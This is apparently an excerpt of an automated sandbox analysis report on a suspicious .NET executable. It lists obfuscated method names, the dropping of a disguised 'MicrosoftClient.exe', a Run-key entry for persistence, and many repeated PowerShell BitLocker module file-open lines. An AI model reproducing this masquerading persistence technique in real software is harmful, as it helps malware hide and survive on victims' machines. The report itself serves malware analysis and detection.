'JgxDH0Jzmif2muKohDfTiZUT1Ls0cCaHTxkK9yDyY7Vc7wiCfZ7cR'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs | High entropy of concatenated method names: 'jhqnO08Zvk17ev11zCn1tDNyTKV4wrZCE3H2RZPlHLutZ98jo9', 'V9mLFi4rb3GvXaL6EBDv0B8HJqs2WFhtPa3AH0lHf3A2pMXVYJ', 'GgcZLQqItYEUYNnNAZ4QKz0diL9fvAuCxQNymlrnZH4nl6sfyR', '_5nEc0S8xY9P4Ra53Ss7UIayp6ClaHO5HD3EtyBzzym99uzNybf'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, CwgUWtA4EqaTAVKSuJbX5wXDfQHTFQ9u4KFXlf86FrRhdWOZZe4aaCgE6NOsP5wgybmILD80wDyjoLU0jDcqZlnSHBFP4AoybT.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'l7QqVOpv5orfSsK1rVePRY0QScELJRgtOU5S5qrR06ts0FGeXA', 'IMuVwxQ7PzQdOPdwzfvWABKRWs1TXTTNssoFw13dzaRdqhx3JW', 'k2S4f9gpgfpnL665tp9amMtsA5IoP9uFBFbPCgEiwTaSyeTujL', 'kH08bywJ8b6ETVolDtOEmOuJegDH2sdJ14AtxT8fI4GzS2JAOc'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, LYQIWx0vxxudRlTzfQ0waGDKlqkAgcH7WUyA3eq2.cs | High entropy of concatenated method names: 'aN8VYkhc0BO34AMF7GwwtAcuEMi8gpLKT0sBVyiJ', 'KF4fWkhGpT0A9Qn818SJnpIJCk1h3stAQcgmNpxB', 'jurUB02cOltjuscD09WWl8F1Os4OJSMGfVHBLrPf', 'u84FUlA8UhiU1Ck0UM3rIdd33UupfVmcENg241d6', 'zBH2q54hjV8xSrFrXE0yEeezAvcde6pR0qEcNUvC', 'Bwlz4YPX68j6SXY3g8EzLyZdsBilO2ilgtMsNFpqHfzWZPH0a1', 'LIScEfY7zZ9tVLYhkj7NZv4T8GgZrwbYaZlOKmPS5UN5HtzRGw', 'zhEDKhI5fm3XXvX7PbMRWPVvQKbIr6tWMUXWD4O9XGBlJ5tM1k', 'YGjf4QSiliOhMxkLAfF03TDhmB4aoUPGEtgyXyGQcXsIlLdYy8', 'JXYPkt8Jc9cHWwIZQVgseSeK4KCbc9BiY7TP3WfRiFuFzwM61c'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs | High entropy of concatenated method names: 'MIC0gXm6oQLdJJNexLAZ0VfQp7AyfIaMpbOVt0M1QQZEcmxA7Sf5L9YIUN', 'xoMoqlJJoBCpUws1UFZyAVxdCo4nimVTZ1HAmCp9FfNxYDh18rUDURGbfR', 'uGU04LhSc0DLfZmkwJ41N4uQxupxiuVB5cnzQc7zH1M4R7qywoQDKi0Uc2', 'D2lsPY8vIDAUmaZv38f94w3l14oWYBUSPfO4AlTvZi42FhqpK9xjwmtVdw', 'xLaib1dRWTsno2J1oeKLMQoDEOi7lPfX9wC4ifXlivIfTlYdbKKz1lGYnh', 'maoX0CbSzaK3Rp28VcoiQMu0Yd8lXEdqZ1n97iyuyV8mnHEWcdUtMo32aR', 'Ntyhb7069wrMlb0XmKNw1PHMTQNHhD7FeCZpkZTap14DxxYTvmwaFExi5G', 'ttrAVNH6YBCZfgmZxa3WCFElLj8U1ZNOWuqbF9YWTWc0wemzUYZCmtiKvT', 'oIjsldVLmBsoVjw0x6MU9ifVuMIypjsEe6oxIf0rF11lzjDqVoi4fiHyTd', '_55PjX53gU1NTJU3tah4lib8YBCex6SJjDcIdwVC9HxM9H8ap37s1hNQ2T5'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, YIsiQT0bVRZkgJBchQD3mj8TT.cs | High entropy of concatenated method names: '_9EKA4mmYhS5A3Vo7PQ5U8yYpV', '_3F8KZvwIIllQlPE51Q7rT7NP6', '_2MK6IwXfT4BOrv9J3aXyidWkj', '_5T1TMhB3O7StVjktbLYkSdIZp', 'iuuUZwHDvSsobqzAj4G742AIvHkq8JAEWiL', 'DlrOYOIGTZV4eJpPtea5byCrFn4zM8nublj', '_9ILnQINVxIYDQ97TVIaa9YyCpB7EXAW5tom5Es3ncPJ1lS95RaMBwRsWQNgKYutlvNo', 'VXmJfTdoGixB1E5Z1wjgTOteiJOmc6KBc4xrCsqFVbJwXC1iznjrsa7UHQE2XigNpuH', '_5wNIasIaQNeaZwCIvHyKNM1SOqS7HX3huPu0AQBwPzVGiYotwHWJSytkXkzbO10a0u5', 'NqPA5cp23835Re9M2uVQVtMMUJvNAjSqvVFtg3TUx4mDFNPZ8gLyuQYAAKvkocPUew0'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, xEidHkjl3ZbqUKvIPhMdYvEBT.cs | High entropy of concatenated method names: 'BDRQ8CiLuswqAppJ4K91S5dh7YdvybCtM3VXEJxg8i33Ed3RgMAv6gmJro', '_2nTtKAoberzYJFa7yq1LShwR8iNGoNekJgkkYX6S1BcPCM8qgTL5QO4WVKcyQKvXUXx', 'CV9weyjNtLvDncWBpl6tyfl7rElfyAYbtml1wChTE2sQe7JYYGIUlJ6anqhPEQaqgxm', 'GmaE3jPyBngvX63rusAkRdVRn1ie9jYpnFfeg98CF9ox4G8MiFGJjJdguFMfwhYFN1T', '_5LiqLS0rriTlip5EnigTqlfbYT3O9Zqp992Vw5piCNSkIp7WEyJpSl0bNpEFgIiES8U'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | High entropy of concatenated method names: 'LRbYTeQD7H3jkFsPe9vpLFlDK', 'hi8i65wpblvGWk5oXoxjBQ3BH', 'l54elty1mfujUEGBMp1X01hln', 'wMGCYdFEkNKYe9j3GZMkOGgBb', '_7ufBfU62R4YZocKbpyUGXuknW', 'vXnHhVT57mZluAzRt80l5DsC6', 'Xyybo5TncnAaF1HAYGa0X7pSt', 'FjPS8U7KdFCmJBM975RiRSOwG', 'q0i2kZtvL6SyvbPYW8hbQYPfk', 'PDkuHMfS9HsSe85HDqEfRBcdl'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, a5vqhNcXHqNHEz8q3VSMya6o4.cs | High entropy of concatenated method names: 'tcLVTujiwrEFL1XBqaq0Gkulh', '_6YDoJioH7lq3A9fcfwP6t5FusMNbaJDowzB', 'zY6zaLyg7utnR5pYiU0cNBx8deQoNVFn4FM', 'Rpmrt7znvurUSjgCFVpoXZqCBkQRHATCDfT', 'B6vwsK21WX1UISAfEue3xQtBL56Pan3z3w4'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs | High entropy of concatenated method names: '_3LFonnJfMRrLHdpajh1txoztqe85dV2AVPAe2ScC', 'A4Ca0fThPYuMM71E9HMZWq5tGxpad03yOTvETA0o', 'pcaW3zWDHX7MVjNus91u9hKz7', 'Jp9k7fXgQoYDxMbOc7uHDDsth', 'nWxxEIQKgRUY1dWWi3OQPdZ89', 'STGNxbu4HbCk1zVHeAiYEueIa', 'Qmu9tHeWTcvzanYgBmEpbSdxN', 'FpuhZCDsHlAP5KMW0BQMk5HSp', 'uCtfHWlMzsUBm2H6W1BOk8o0J', 'cMoLfn0A28VUYcraKWobh80Nc'
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | File created: C:\Users\user\AppData\Local\MicrosoftClient.exe
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftClient

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
